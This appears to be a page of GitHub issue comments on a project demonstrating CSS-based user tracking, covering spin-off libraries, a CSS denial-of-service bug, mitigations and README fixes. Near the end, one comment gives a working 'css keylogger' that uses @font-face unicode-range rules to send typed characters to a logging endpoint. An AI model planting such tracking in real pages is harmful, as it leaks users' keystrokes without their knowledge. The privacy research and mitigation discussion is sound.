jbtronics / crookedstylesheets Goto Github PK

Hi. First of all thanks for your work.
Your code inspired me to write small library for tracking css (i call it spycss).

You can see sources at https://github.com/Bogdaan/spycss
And small demo at https://github.com/Bogdaan/spycss-demo (live demo - https://spycss.hcbogdan.com)

I will be grateful if you will advise what can be improved.

I just found a bug or something with css variables, and it seems to be an easy dos thing.
Check my repo: https://github.com/ceigh/css-dos

An other solution would be to block the ability to load dynamic content like php file.

What if you created an invisible css grid on top of your whole webpage and tracked mouse movement that way. (Sounds way easier and more enjoyable than wrapping everything separately in your markup somehow...

我通过观察发现，并不是在能拿到第一次的内容，当过了10分钟后，依然能拿到，所以我认为 可以在缓冲区这上面下手。

I don't mean this to be snarky or mean - Please consider revising the README without the rampant abuse of commas. Nearly every sentence has an unneeded pause introduced by a comma and it makes fluidly reading through your fascinating notes somewhat more difficult.

After developing the CSS detection in MS Edge, I was not able to detect the duration value.

I´m referring to this pull request where the detection was made for MS Edge -> #16

CSS Exfil Protection is an extension to protect against this vulnerability.
It should be added under What you can do to prevent tracking with this method in the Readme.

So, disabling CSS is not a real option, except when you are very worried about your privacy (for example, when you are using the Tor browser, you should maybe disable CSS).

Actually not required because things like user agent, screen resolution, fonts, etc. are already normalized and should be more or less identical for all users of TBB.

Hello, neat CSS trick; it works great on newer browsers that support the CSS methods used. Older browser versions — I tested Firefox v50 and Opera v12 — respond to font tracking only, no other results show; other than that, the CSS on the test page works as expected; i.e., color changes appropriately, etc.

So this is not really a bug…but may be helpful as a mitigation method under the README's prevention section?

You can have the track.php script return a 404. The browser won't cache the response and attempt to get it again on the next event.

Demo page is dead (404); recreate it right on github.io?

Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:

<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log

completly is in your README.md a few times where you actually want it to be completely